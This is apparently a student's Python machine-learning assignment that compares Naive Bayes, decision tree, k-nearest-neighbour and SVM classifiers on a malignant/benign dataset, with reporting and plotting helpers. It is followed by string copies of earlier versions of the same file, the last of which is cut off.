# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_cv_report(r):
'''
    Print nicely formatted statistics from cross-validation results: the mean
    of each score on both the training folds and the held-out (validation)
    folds, plus the mean fit and score times.
@param:
results: a dict of results from running sklearn.model_selection.cross_validate,
scored by accuracy, roc_auc, precision and recall.
@return:
None. Print to console.
'''
score_grid = ["accuracy", "precision", "recall", "f1", "roc_auc"]
# Print title bar.
print("\n\n- - - VALIDATION REPORT - - -")
# Print training and test ("validation") scores on all metrics.
print('\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))
for metric in score_grid:
print('{:12} {:8.2f} {:12.2f}'.format(metric + ':',
np.mean(r['train_%s' % metric]),
np.mean(r['test_%s' % metric] )))
print('\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))
print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_grid_search_report(grid):
'''
    Print nicely formatted statistics from GridSearchCV results: the best
    hyperparameter value found, and the mean of each score on both the training
    folds and the held-out (validation) folds for that value, plus the mean
    fit and score times.
@param:
grid: a GridSearchCV object scored by accuracy, roc_auc, precision and
recall, that has been fitted and therefore is available for
access through cv_results_
@return:
None. Print to console.
'''
r = grid.cv_results_
i = grid.best_index_
    score_grid = grid.scoring  # use the GridSearchCV object passed in, not the global clf
# Print the parameter optimized and the ideal value found
print("\n\n- - - VALIDATION REPORT - - -")
print("Based on validation {} scores, the best value for hyperparameter '{}' is:\n{}".format(
grid.refit,
list(grid.best_params_.keys())[0],
list(grid.best_params_.values())[0]) )
# For the ideal parameter value, print train and test ("validation") scores
print('\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))
for metric in score_grid:
print('{:12} {:8.2f} {:12.2f}'.format(metric + ':',
r['mean_train_%s' % metric][i],
r['mean_test_%s' % metric][i] ))
print('\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))
print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def plot_grid_search_results(clf):
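    '''
    Plot the mean validation score of each metric in clf.scoring against the
    hyperparameter values searched by the fitted GridSearchCV object.
    @param:
        clf: a fitted GridSearchCV object whose param_grid contains a single
            hyperparameter
    @return:
        None. Shows a matplotlib figure.
    '''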
# Organize data and labels
param_name = list(clf.param_grid.keys())[0]
param_vals = list(clf.param_grid.values())[0]
    metric_names = clf.scoring  # avoid shadowing the imported sklearn metrics module
    score_grid = []
    for name in metric_names:
        score_grid.append(clf.cv_results_['mean_test_%s' % name])
    # Plot the organized data and labels
    p = plt
    for name, scores in zip(metric_names, score_grid):
        p.plot(param_vals, scores, '-', label=name)
# Configure plot and show
p.title("Hyperparameter Optimization by Cross-Validation")
p.xlabel(param_name + " value")
if param_name =='gamma': p.xscale('log')
p.ylabel('average test score')
p.legend(loc="lower right")
p.grid(True)
p.show()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_introduction(team_array):
'''
Print a nice introduction to the code being run, including well-formatted
team member list.
@param:
team_array: array of student numbers and names returned form my_team()
@return:
None. Print to console.
'''
print("\n\n***************************************************************")
print(" CAB320 ASSIGNMENT 2: MACHINE LEARNING ")
print("***************************************************************")
print("\nTEAM MEMBERS:")
for person in team_array:
print('{:4} {:4} {:10} {:10}'.format(person[0],':',person[1], person[2]))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_clf_intro(name, params=None):
'''
Print a nice introduction to the classifier being tested and used.
@param:
name: string holding the name of the classifier type
params: dict holding the name of the hyperparameter to be optimized
@return:
None. Print to console.
'''
print("\n\n\n\n***************************************************************")
print("* {} CLASSIFIER".format(name))
if(params is not None):
print("\nHyperparameter: " + list(params.keys())[0]) # JUST KEY
print("Values Tested: {} values from {} to {}".format(
len( list(params.values())[0] ),
min( list(params.values())[0] ),
max( list(params.values())[0] ) ) )
print("\nWorking...")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# MAIN FUNCTION
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == "__main__":
# --------------------- Data-specific variables ----------------------
# Change these as required.
class_labels = ("Malignant", "Benign") #corresponding to (1,0) binary vals
path_to_data = 'medical_records.data'
test_set_ratio = 0.2
    # Store a list of the classifier-building functions needed for testing and classification
function_list = [
build_NB_classifier,
build_DT_classifier,
build_NN_classifier,
build_SVM_classifier
]
# ------------------------ Experiment process ------------------------
# Print the team.
print_introduction(my_team())
# Pre-process the dataset.
data, labels = prepare_dataset(path_to_data)
# Split the dataset into the corresponding ratio for crossvalidation.
# Set random_state to a hard-coded number to ensure repeatability.
train_data,test_data,train_labels,test_labels = model_selection.train_test_split(
data, labels, test_size=test_set_ratio, random_state=1)
# Print split information.
print('\n\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(
(1-test_set_ratio)*100, len(train_data), sum(train_labels), (sum(train_labels)*100)/len(train_data)))
print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(
test_set_ratio*100, len(test_data), sum(test_labels), (sum(test_labels)*100)/len(test_data)))
# Analyze and use each classifier, show results.
for function in function_list:
if function is build_NB_classifier:
# Indicator for NBC.
# Handle this differently, since no optimization is necessary.
t0 = time.time()
clf, cv_results = function(train_data, train_labels)
print_cv_report(cv_results)
else:
# Create appropriate optimized classifier and report VALIDATION metrics.
t0 = time.time()
clf = function(train_data, train_labels)
print_grid_search_report(clf)
plot_grid_search_results(clf)
t1 = time.time()
print("\nCross-validation, optimization, and fitting took {:.6f} seconds total.".format(t1-t0))
# Quantify the classifier's performance on the TRAINING set.
pred_train_labels = clf.predict(train_data)
t2 = time.time()
print("\n\n- - - TRAINING REPORT - - -")
print_prediction_report(pred_train_labels, train_labels, class_labels)
print("\nPrediction on training set took {:.6f} seconds.".format(t2-t1))
# Quantify the classifier's performance on TEST SET.
t3 = time.time()
pred_labels = clf.predict(test_data)
t4 = time.time()
print("\n\n- - - TEST REPORT - - -")
print_prediction_report(pred_labels, test_labels, class_labels)
print("\nPrediction on test set took {:.6f} seconds.".format(t4-t3))
| [
"'''\n\nScaffolding code for the Machine Learning assignment. \n\nYou should complete the provided functions and add more functions and classes as necessary.\n \nWrite a main function that calls the different functions to perform the required tasks \nand repeat your experiments.\n\n'''\n\n\n'''\n INSTRUCTIONS:\n - Simply running the code as is will work, no actions required as long\n as the dataset is in the same directory as this file. \n \n \n TO CHANGE DATASETS: \n - scroll all the way down to the main function and \n change \"path_to_data\"\n - the class label names should also be changed to reflect those\n in the new dataset - the code handles two, binary class labels. \n TO CHANGE TRAIN-TEST RATIO: \n - scroll to main, change \"test_set_ratio\"\n TO CHANGE HYPERPARAMETERS: \n - go into each build_AB_classifier function\n and change the dict variable called \"params\". Both param name and \n values/ranges can be changed, and the rest of the code will handle\n this change totally fine.\n TO CHANGE THE RE-FIT METRIC: \n - this metric determines how the hyperparameter search (GridSearchCV) \n picks the best set of hyperparameter values.\n - it can be changed by going into each classifier function and \n changing \"refit\" parameter passed to GridSearchCV \n - the rest of the code will handle this change without any more action \n required\n TO CHANGE THE SCORING METRICS: \n - as long as the refit metric is included here, each classifier \n function can have GridSearchCV performance reported on any metrics \n desired\n - they can even be different between classifiers\n - scroll to the classifier function and enter string names of the \n metrics desired into the GridSearchCV list parameter labelled\n \"scoring\"\n - the rest of the code will handle this change. \n \n \n Nothing else should have to be changed. \n\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import naive_bayes, neighbors, tree, svm, model_selection, metrics\nimport warnings \nimport time\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# REQUIRED FUNCTIONS\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef my_team():\n '''\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n '''\n return [ (10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt') ]\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef prepare_dataset(dataset_path):\n ''' \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. 
y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n '''\n \n # Read the file elements (separated by commas) into a np array.\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n \n # Store the file's shape as variables to use later.\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n \n # Create an array to store all file data except the class labels (col 1).\n X = np.zeros((num_examples, num_features-1)) #dtype = float (default)\n X[:,0] = file_as_array.copy()[:,0] #automatically converts to floats\n X[:,1:] = file_as_array[:,2:] \n \n # Create a 1D array to store all the class labels ('B' or 'M').\n y = np.zeros_like(file_as_array[:,1], dtype=int)\n for i in range(len(y)):\n # Store a binary 1 for M, 0 for B\n y[i] = (file_as_array[i,1]=='M')\n \n \n return X,y\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef build_NB_classifier(X_training, y_training):\n ''' \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n '''\n \n print_clf_intro(\"NAIVE BAYES\")\n \n # Instantiate a Multinomial NB classifier.\n nbc = naive_bayes.MultinomialNB()\n \n # Perform cross validation and store results. \n results = model_selection.cross_validate(nbc, X_training, y_training, \n return_train_score=True,\n scoring=['accuracy', \n 'precision', \n 'roc_auc', \n 'recall',\n 'f1'])\n \n # Fit the data with X-training.\n nbc.fit(X_training, y_training)\n \n # Return the classifier object and CV results. \n return nbc, results\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n\ndef build_DT_classifier(X_training, y_training):\n ''' \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n '''\n \n # HYPERPARAMTER TO OPTIMIZE: NAME AND TEST RANGE\n params = { 'max_depth': np.linspace(1,100,100, dtype=int) } \n print_clf_intro(\"DECISION TREE\", params) \n \n # Instantiate a GridSearchCV object of Decision Tree classifier type.\n # Pass an int to random_state to ensure repeatability.\n dtc = model_selection.GridSearchCV( tree.DecisionTreeClassifier(random_state=5), \n params, \n return_train_score=True,\n # cv=4, #use default 3 or uncomment\n scoring=['accuracy',\n 'roc_auc',\n 'precision', \n 'recall',\n 'f1'],\n refit='roc_auc'\n )\n \n # Fit the data, which will run k-fold cross-validation on X_training. 
\n with warnings.catch_warnings():\n # Prevent warnings from printing (and ruining all my nice formatting!!)\n # Warnings tell us that some precision values are zero, but they are \n # for parameter values that are BAD and wont be used anyways, so it\n # isnt an issue but we still need to test them in GridSearchCV. \n warnings.simplefilter(\"ignore\") \n dtc.fit(X_training, y_training)\n \n # Return the GridSearchCV object, which automatically uses the best \n # estimator for predictions, but also allows access to cv_results_.\n return dtc \n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n\ndef build_NN_classifier(X_training, y_training):\n ''' \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n '''\n \n # HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE\n params = { 'n_neighbors': np.linspace(1,200, 200, dtype=int) } \n print_clf_intro(\"NEAREST NEIGHBOR\", params)\n \n # Instantiate a GridSearchCV object of KNN classifier type.\n knn = model_selection.GridSearchCV( neighbors.KNeighborsClassifier(), \n params, \n return_train_score=True,\n # cv=4, #use default 3 or uncomment\n scoring=['accuracy', \n 'roc_auc',\n 'precision', \n 'recall',\n 'f1'],\n refit='roc_auc'\n ) \n \n # Fit the data, which will run k-fold cross-validation on X_training.\n with warnings.catch_warnings():\n # Prevent warnings from printing (and ruining all my nice formatting!!)\n # Warnings tell us that some precision values are zero, but they are \n # for parameter values that are BAD and wont be used anyways, so it\n # isnt an issue but we still need to test them in GridSearchCV.\n warnings.simplefilter(\"ignore\")\n knn.fit(X_training, y_training)\n \n # Return the GridSearchCV object, which automatically uses the best \n # estimator for predictions, but also allows access to cv_results_.\n return knn\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n\ndef build_SVM_classifier(X_training, y_training):\n ''' \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. 
a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n '''\n \n # HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE\n params ={ 'gamma': np.logspace(-10, 1, 100) } \n print_clf_intro(\"SUPPORT VECTOR MACHINE\", params)\n \n # Instantiate a GridSearchCV object of SVC classifier type.\n svc = model_selection.GridSearchCV( svm.SVC(), #to allow neg_log_loss \n params, \n return_train_score=True,\n # cv=4, #use default of 3, or uncomment\n scoring=['accuracy', \n 'roc_auc',\n 'precision', \n 'recall',\n 'f1', ],\n refit='roc_auc'\n ) \n \n # Fit the data, which will run k-fold cross-validation on X_training.\n with warnings.catch_warnings():\n # Prevent warnings from printing (and ruining all my nice formatting!!)\n # Warnings tell us that some precision values are zero, but they are \n # for parameter values that are BAD and wont be used anyways, so it\n # isnt an issue but we still need to test them in GridSearchCV.\n warnings.simplefilter(\"ignore\")\n svc.fit(X_training, y_training)\n \n # Return the GridSearchCV object, which automatically uses the best \n # estimator for predictions, but also allows access to cv_results_.\n return svc\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# ADDITIONAL FUNCTIONS \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \ndef print_prediction_report(y_pred, y_true, names):\n '''\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n '''\n \n labels = (1,0)\n \n # Confusion matrix.\n print('\\nConfusion Matrix:') \n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names)==len(cm)\n assert cm.shape == (2,2) \n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:',names[0], names[1], 'All'))\n print(\"ACTUAL: \")\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm[0,0], '','(FN)', cm[0,1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm[1,0], '','(TN)', cm[1,1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All',sum(cm[:,0]), sum(cm[:,1]), sum(sum(cm))))\n \n # Classification report.\n print(\"\\nClassification Report:\")\n print(metrics.classification_report(y_true, y_pred, labels, target_names=names))\n \n # Miscellaneous metrics.\n print(\"\\nOverall Metrics:\")\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('variance:', metrics.explained_variance_score(y_true, y_pred) ))\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n \ndef print_cv_report(r):\n '''\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n '''\n \n score_grid = [\"accuracy\", \"precision\", \"recall\", \"f1\", \"roc_auc\"]\n \n # Print title bar.\n print(\"\\n\\n- - - VALIDATION REPORT - - -\") \n \n # Print training and test (\"validation\") scores on all metrics. \n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', \n np.mean(r['train_%s' % metric]),\n np.mean(r['test_%s' % metric] )))\n \n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef print_grid_search_report(grid):\n '''\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. 
\n '''\n\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n \n # Print the parameter optimized and the ideal value found\n print(\"\\n\\n- - - VALIDATION REPORT - - -\")\n print(\"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\".format(\n grid.refit, \n list(grid.best_params_.keys())[0], \n list(grid.best_params_.values())[0]) ) \n \n # For the ideal parameter value, print train and test (\"validation\") scores\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', \n r['mean_train_%s' % metric][i],\n r['mean_test_%s' % metric][i] ))\n \n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef plot_grid_search_results(clf): \n # Organize data and labels\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring \n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n\n # Plot the organized data and labels\n p = plt\n idx=0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx+=1\n \n # Configure plot and show\n p.title(\"Hyperparameter Optimization by Cross-Validation\")\n p.xlabel(param_name + \" value\")\n if param_name =='gamma': p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc=\"lower right\")\n p.grid(True)\n p.show()\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef print_introduction(team_array):\n '''\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n '''\n \n print(\"\\n\\n***************************************************************\")\n print(\" CAB320 ASSIGNMENT 2: MACHINE LEARNING \")\n print(\"***************************************************************\")\n print(\"\\nTEAM MEMBERS:\")\n\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0],':',person[1], person[2]))\n \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n \ndef print_clf_intro(name, params=None):\n '''\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. 
\n '''\n \n print(\"\\n\\n\\n\\n***************************************************************\")\n print(\"* {} CLASSIFIER\".format(name))\n if(params is not None):\n print(\"\\nHyperparameter: \" + list(params.keys())[0]) # JUST KEY\n print(\"Values Tested: {} values from {} to {}\".format( \n len( list(params.values())[0] ), \n min( list(params.values())[0] ), \n max( list(params.values())[0] ) ) )\n print(\"\\nWorking...\")\n \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n \n \n \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# MAIN FUNCTION\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \nif __name__ == \"__main__\":\n\n# --------------------- Data-specific variables ----------------------\n # Change these as required. \n class_labels = (\"Malignant\", \"Benign\") #corresponding to (1,0) binary vals\n path_to_data = 'medical_records.data'\n test_set_ratio = 0.2\n \n # Store a list of all parameters necesary for testing and classification\n function_list = [\n build_NB_classifier,\n build_DT_classifier,\n build_NN_classifier,\n build_SVM_classifier\n ]\n\n\n# ------------------------ Experiment process ------------------------\n\n # Print the team.\n print_introduction(my_team())\n \n # Pre-process the dataset.\n data, labels = prepare_dataset(path_to_data)\n \n # Split the dataset into the corresponding ratio for crossvalidation. \n # Set random_state to a hard-coded number to ensure repeatability.\n train_data,test_data,train_labels,test_labels = model_selection.train_test_split(\n data, labels, test_size=test_set_ratio, random_state=1) \n \n # Print split information.\n print('\\n\\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(\n (1-test_set_ratio)*100, len(train_data), sum(train_labels), (sum(train_labels)*100)/len(train_data)))\n print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(\n test_set_ratio*100, len(test_data), sum(test_labels), (sum(test_labels)*100)/len(test_data)))\n\n # Analyze and use each classifier, show results. \n for function in function_list:\n \n if function is build_NB_classifier: \n # Indicator for NBC. \n # Handle this differently, since no optimization is necessary.\n t0 = time.time()\n clf, cv_results = function(train_data, train_labels)\n print_cv_report(cv_results)\n \n else:\n # Create appropriate optimized classifier and report VALIDATION metrics.\n t0 = time.time()\n clf = function(train_data, train_labels)\n print_grid_search_report(clf)\n plot_grid_search_results(clf)\n \n t1 = time.time() \n print(\"\\nCross-validation, optimization, and fitting took {:.6f} seconds total.\".format(t1-t0))\n\n # Quantify the classifier's performance on the TRAINING set.\n pred_train_labels = clf.predict(train_data)\n t2 = time.time()\n print(\"\\n\\n- - - TRAINING REPORT - - -\")\n print_prediction_report(pred_train_labels, train_labels, class_labels)\n print(\"\\nPrediction on training set took {:.6f} seconds.\".format(t2-t1))\n \n # Quantify the classifier's performance on TEST SET. \n t3 = time.time()\n pred_labels = clf.predict(test_data)\n t4 = time.time()\n print(\"\\n\\n- - - TEST REPORT - - -\")\n print_prediction_report(pred_labels, test_labels, class_labels)\n print(\"\\nPrediction on test set took {:.6f} seconds.\".format(t4-t3))\n",
"<docstring token>\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import naive_bayes, neighbors, tree, svm, model_selection, metrics\nimport warnings\nimport time\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\ndef build_NN_classifier(X_training, y_training):\n \"\"\" \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. 
\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'n_neighbors': np.linspace(1, 200, 200, dtype=int)}\n print_clf_intro('NEAREST NEIGHBOR', params)\n knn = model_selection.GridSearchCV(neighbors.KNeighborsClassifier(),\n params, return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n knn.fit(X_training, y_training)\n return knn\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
